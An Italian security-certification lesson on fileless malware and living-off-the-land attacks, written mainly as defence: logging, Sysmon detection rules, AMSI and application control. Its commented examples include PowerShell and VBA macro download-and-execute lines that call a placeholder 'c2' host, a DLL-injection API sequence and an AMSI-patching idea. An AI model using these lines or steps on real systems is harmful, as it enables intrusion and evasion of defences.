Malware fileless e attacchi Living off the Land
Impari come il malware fileless sfrutti strumenti legittimi (PowerShell, WMI, macro) per eludere il rilevamento tradizionale basato sulle firme.
Malware fileless e attacchi Living off the Land è una lezione Cloud & IT Cert Prep gratuita su CoddyKit. Questa è la lezione 4 di 4. Puoi leggere la lezione completa qui gratuitamente — poi esercitati direttamente nel browser con un editor di codice integrato e un tutor IA disponibile 24/7. Fa parte del percorso di apprendimento Cloud & IT Cert Prep, e i tuoi progressi si sincronizzano tra il web e l'app CoddyKit. Il corso Cloud & IT Cert Prep include 4 lezioni in totale.
Perché gli attacchi fileless sono così efficaci
Il malware tradizionale scrive file eseguibili sul disco, offrendo agli antivirus basati sulle firme l'opportunità di analizzarli e rilevarli. Il malware fileless opera interamente in memoria oppure sfrutta strumenti legittimi già installati, senza lasciare i tradizionali file malware che l'antivirus possa individuare. Questo riduce drasticamente i tassi di rilevamento degli strumenti basati sulle firme. I fornitori di soluzioni di sicurezza riferiscono che gli attacchi malware fileless hanno una probabilità di successo 10 volte maggiore rispetto agli attacchi basati su file. Il colpo alla Bangladesh Bank del 2016, le varianti Petya/NotPetya del 2017 e innumerevoli intrusioni condotte da gruppi sponsorizzati da Stati hanno sfruttato tecniche fileless per mantenere la persistenza e non farsi rilevare.
Tecniche Living-off-the-Land (LotL)
Gli attacchi living-off-the-land (LotL) usano strumenti e utilità legittimi già presenti nel sistema della vittima per svolgere attività dannose. Questi strumenti — PowerShell, WMI, certutil, mshta, regsvr32, rundll32 — sono considerati attendibili dal sistema operativo e dai software di sicurezza perché hanno scopi legittimi. Un attaccante che usa esclusivamente strumenti integrati può confondersi con la normale attività amministrativa. La difficoltà per i difensori consiste nel distinguere l'uso dannoso di questi strumenti dal lavoro amministrativo legittimo. Per questo, per le tecniche LotL l'analisi comportamentale e la conoscenza del contesto sono più efficaci del rilevamento basato sulle firme.
# Common LotL (LOLBins - Living Off the Land Binaries):
# certutil.exe - download files from internet
# mshta.exe - execute HTA (HTML Application) scripts
# regsvr32.exe - execute DLL or scriptlets remotely (Squiblydoo)
# rundll32.exe - execute DLL exports
# wmic.exe - WMI queries and lateral movement
# bitsadmin.exe - download/upload via BITS service
# powershell.exe - nearly unlimited capability
# cmstp.exe - bypass UAC, run scriptsPowerShell come strumento di attacco
PowerShell è lo strumento LotL più abusato perché offre accesso all'intero framework .NET, a WMI e alle API di Windows, lasciando tracce minime quando viene eseguito in memoria. Gli attaccanti scaricano gli script PowerShell direttamente in memoria senza scriverli sul disco, codificano i comandi in Base64 per offuscarli nei log e usano funzionalità come la reflection per caricare assembly .NET in memoria. I framework Empire e Cobalt Strike fanno ampio affidamento su PowerShell nella fase successiva allo sfruttamento. Le difese includono PowerShell Constrained Language Mode, ScriptBlock Logging (che registra il contenuto decodificato degli script), Module Logging e la limitazione, tramite Group Policy, degli utenti autorizzati a eseguire PowerShell.
# PowerShell attack example (educational):
# Download and execute payload entirely in memory:
# powershell.exe -NoP -NonI -Exec Bypass -W Hidden -Enc <base64>
# IEX (New-Object Net.WebClient).DownloadString('http://c2/payload.ps1')
# Defense: Enable PowerShell logging (Group Policy):
# Computer Config -> Admin Templates -> Windows Components
# -> Windows PowerShell
# Turn on PowerShell Script Block Logging: Enabled
# Turn on Module Logging: Enabled
# Turn on Transcription: EnabledWMI per la persistenza e il movimento laterale
WMI (Windows Management Instrumentation) è una potente funzionalità di Windows per la gestione dei sistemi, che gli attaccanti sfruttano per la persistenza e il movimento laterale. Una sottoscrizione a eventi WMI attiva un comando quando si verifica un evento specifico, ad esempio ogni 5 minuti, all'accesso dell'utente o all'avvio di un determinato processo. Queste sottoscrizioni sopravvivono ai riavvii, vengono archiviate nel repository WMI e non compaiono come attività pianificate tradizionali o chiavi Run del registro, eludendo molti strumenti di rilevamento della persistenza. Gli attaccanti possono inoltre usare WMI per eseguire processi su sistemi remoti tramite DCOM (porta 135), consentendo il movimento laterale senza ricorrere a condivisioni di rete.
# WMI event subscription for persistence (educational):
# Filter: every 5 minutes
# Consumer: execute powershell command
# Binding: connect filter to consumer
#
# Detection:
# Monitor WMI subscriptions:
Get-WMIObject -Namespace root\subscription -Class __EventFilter
Get-WMIObject -Namespace root\subscription -Class CommandLineEventConsumer
Get-WMIObject -Namespace root\subscription -Class __FilterToConsumerBinding
# Sysmon Event ID 19/20/21: WMI events loggedTecniche di process injection
# DLL injection API sequence:
# 1. OpenProcess(PROCESS_ALL_ACCESS, target_pid)
# 2. VirtualAllocEx(target, NULL, dll_path_len, MEM_COMMIT, PAGE_READWRITE)
# 3. WriteProcessMemory(target, alloc_addr, dll_path, dll_path_len)
# 4. CreateRemoteThread(target, NULL, 0, LoadLibraryA, alloc_addr)
# Sysmon rules to detect injection:
# Event ID 8: CreateRemoteThread
# Event ID 10: ProcessAccess (targetted process opened)
# Event ID 25: ProcessTampering (image changed in memory)Documenti con macro come punti di ingresso
Molte catene di attacco fileless iniziano con un documento Office dannoso contenente macro VBA. Quando l'utente apre il documento e abilita le macro (spesso attirato da un messaggio come 'Enable Content to view this document'), la macro esegue PowerShell per scaricare ed eseguire un payload direttamente in memoria. Il payload non viene mai scritto sul disco: solo il documento Office originale vi accede. Per questo l'esame Security+ sottolinea l'importanza di disabilitare le macro e distribuire regole ASR (Attack Surface Reduction). I moderni framework di phishing attacker-in-the-middle (come Evilginx2) distribuiscono inoltre documenti dannosi dopo la cattura delle credenziali per installare RAT.
# Malicious macro flow (educational):
# 1. User receives .docm via email
# 2. User opens, clicks 'Enable Content'
# 3. VBA macro runs:
# Shell 'powershell -ep bypass -nop -c "IEX(New-Object Net.WebClient).DownloadString(''http://c2/stage2.ps1'')"'
# 4. PowerShell downloads stage2 into memory
# 5. stage2 runs shellcode / loads Cobalt Strike Beacon in memory
# 6. No malware files on disk; only the .docm exists
# ASR rule to block:
# 'Block all Office applications from creating child processes'AMSI: Antimalware Scan Interface
AMSI (Antimalware Scan Interface) è un'API di Windows che consente alle applicazioni (PowerShell, VBScript, JScript, Office) di inviare contenuti al motore antivirus installato per la scansione durante l'esecuzione, anche prima che tali contenuti vengano scritti sul disco. AMSI permette ai fornitori di antivirus di analizzare il contenuto degli script, che altrimenti sarebbe invisibile alla scansione basata sui file. Gli attaccanti tentano di eludere AMSI modificando in memoria amsi.dll per restituire il risultato 'clean' per tutti gli invii, oppure offuscando il contenuto degli script per evitare la corrispondenza delle firme. Gli strumenti EDR monitorano i tentativi di modifica di AMSI come indicatore di attività di attacco fileless.
# How AMSI works:
# PowerShell/WScript calls AmsiScanBuffer() before execution
# Windows Defender (or other AV) scans the buffer
# If malicious: AMSI returns AMSI_RESULT_DETECTED -> execution blocked
# AMSI bypass attempts to detect (Sysmon/EDR):
# Memory write to amsi.dll: patch AmsiScanBuffer to always return 0
# Unloading amsi.dll from process memory
# PowerShell Constrained Language Mode + AMSI = stronger defenseRilevamento degli attacchi fileless
Il rilevamento del malware fileless richiede il passaggio dal rilevamento basato sui file al monitoraggio comportamentale. Le principali strategie di rilevamento includono: PowerShell ScriptBlock Logging, che acquisisce il contenuto decodificato degli script anche se codificato nella riga di comando; Sysmon, che registra la creazione dei processi con le righe di comando complete, le connessioni di rete con l'associazione al processo e le modifiche al registro; regole comportamentali EDR, che generano avvisi sulle relazioni sospette tra processi (Word che avvia PowerShell, PowerShell che avvia cmd, certutil che scarica eseguibili); e Windows Event Forwarding, che invia questi log a un SIEM centralizzato per la correlazione e la conservazione a lungo termine.
# Sysmon detection rules for LotL:
# Event ID 1: Process creation
# Alert if: Word.exe spawns cmd.exe or powershell.exe
# Alert if: certutil.exe with -urlcache -f parameters
# Alert if: mshta.exe with remote URL argument
# Event ID 3: Network connection
# Alert if: powershell.exe initiates outbound connection
# Alert if: mshta.exe connects to non-Microsoft IPs
# Event ID 7: Image loaded
# Alert if: known-bad DLL loaded into legitimate processLimitazione dell'uso degli strumenti LotL
Le organizzazioni possono ridurre la superficie di attacco LotL limitando gli utenti autorizzati a eseguire strumenti potenti. PowerShell Constrained Language Mode limita le chiamate .NET, gli oggetti COM e la reflection su cui fanno affidamento gli attaccanti. AppLocker e WDAC (Windows Defender Application Control) possono impedire agli utenti non amministratori di eseguire determinari binari. Il progetto LOLBAS cataloga i binari LotL conosciuti e le relative tecniche di attacco, aiutando i difensori a individuare quali binari monitorare o limitare. Non è possibile bloccare tutti i binari LotL, poiché molti sono necessari al funzionamento del sistema operativo, ma è possibile monitorarne l'uso tenendo conto del contesto.
# PowerShell Constrained Language Mode:
$ExecutionContext.SessionState.LanguageMode = 'ConstrainedLanguage'
# Or via WDAC policy; CLM automatically applied when WDAC is active
# AppLocker: block mshta.exe for standard users
# Computer Config -> Windows Settings -> Security Settings
# -> Application Control Policies -> AppLocker
# Executable Rules -> Add Rule -> Deny -> mshta.exe (path rule)
# WDAC (stronger than AppLocker):
# Cannot be bypassed by local admin unlike AppLocker
# Enforced at kernel levelCopertura MITRE ATT&CK delle tecniche fileless
Il framework MITRE ATT&CK documenta ampiamente le tecniche fileless e LotL. Tra le principali sottotecniche vi sono: T1059.001 (PowerShell), T1047 (esecuzione tramite WMI), T1055 (Process Injection), T1140 (Deobfuscate/Decode Files), T1003.001 (memoria di LSASS per il dumping delle credenziali) e T1546.003 (sottoscrizione a eventi WMI per la persistenza). La mappatura delle capacità di rilevamento rispetto a queste tecniche tramite ATT&CK Navigator evidenzia le lacune di copertura e guida lo sviluppo delle regole SIEM. Il framework fornisce inoltre indicazioni di mitigazione e rilevamento per ogni tecnica.
Riepilogo delle difese contro il malware fileless
Una strategia di difesa multilivello contro il malware fileless include: abilitare il logging di PowerShell (ScriptBlock, Module, Transcription), distribuire Sysmon con una configurazione completa, implementare AMSI con un motore antivirus aggiornato, applicare PowerShell Constrained Language Mode tramite WDAC, limitare l'esecuzione delle macro nei documenti Office tramite Group Policy, distribuire EDR con funzionalità di rilevamento comportamentale e inoltrare tutti i log a un SIEM con regole di rilevamento per le catene di processi note come dannose. La combinazione tra la riduzione della superficie di attacco e una maggiore visibilità rende molto più difficile eseguire attacchi fileless senza essere rilevati.
Verifica rapida
Verifichi la propria comprensione dei concetti di CompTIA Security+ (SY0-701) trattati in questa lezione.
Riepilogo della lezione
In questa lezione ha imparato che il malware fileless opera in memoria e sfrutta strumenti legittimi del sistema operativo come PowerShell, WMI e certutil per eludere il rilevamento basato sulle firme; le tecniche di process injection nascondono il codice dannoso all'interno di processi attendibili sfruttando le API di gestione della memoria di Windows; inoltre, il rilevamento comportamentale tramite SIEM, Sysmon ed EDR, combinato con il logging di PowerShell e AMSI, offre la difesa più efficace contro queste catene di attacco che eludono le firme. Nella prossima lezione esamineremo la differenza tra vulnerability scanning e penetration testing.
Domande Frequenti
La lezione «Malware fileless e attacchi Living off the Land» è gratuita?
Sì — il testo completo di «Malware fileless e attacchi Living off the Land» è gratuito qui sul web. Per esercitarvi in modo interattivo (un editor di codice integrato e un tutor IA 24/7) e sbloccare il resto del corso Cloud & IT Cert Prep, passa a CoddyKit PRO. Il corso Cloud & IT Cert Prep include 4 lezioni in totale.
Cosa imparerò in «Malware fileless e attacchi Living off the Land»?
Impari come il malware fileless sfrutti strumenti legittimi (PowerShell, WMI, macro) per eludere il rilevamento tradizionale basato sulle firme. Eserciti Cloud & IT Cert Prep con codice pratico che esegui direttamente nel browser, e un tutor IA 24/7 risponde alle tue domande mentre lavori sulla lezione.
Ho bisogno di esperienza per iniziare Cloud & IT Cert Prep?
Non è richiesta alcuna esperienza precedente. Cloud & IT Cert Prep su CoddyKit è strutturato per principianti e studenti avanzati, quindi puoi iniziare da qui o dall'inizio e procedere al tuo ritmo. Questa è la lezione 4 di 4.
Quanto tempo richiede la lezione «Malware fileless e attacchi Living off the Land»?
La maggior parte delle lezioni CoddyKit richiede circa 5–10 minuti. Ogni lezione è breve e interattiva, quindi fai progressi costanti e riprendi esattamente da dove hai lasciato su web e app.
Posso scrivere ed eseguire codice in questa lezione Cloud & IT Cert Prep?
Sì. Ogni lezione Cloud & IT Cert Prep include un editor di codice integrato, quindi scrivi ed esegui codice reale direttamente nel tuo browser e ricevi feedback istantaneo dall'IA — nessuna configurazione locale necessaria.
Tutte le lezioni di questo corso
- Virus, worm e trojan
- Ransomware e cryptolocker
- Rootkit, spyware e keylogger
- Malware fileless e attacchi Living off the Land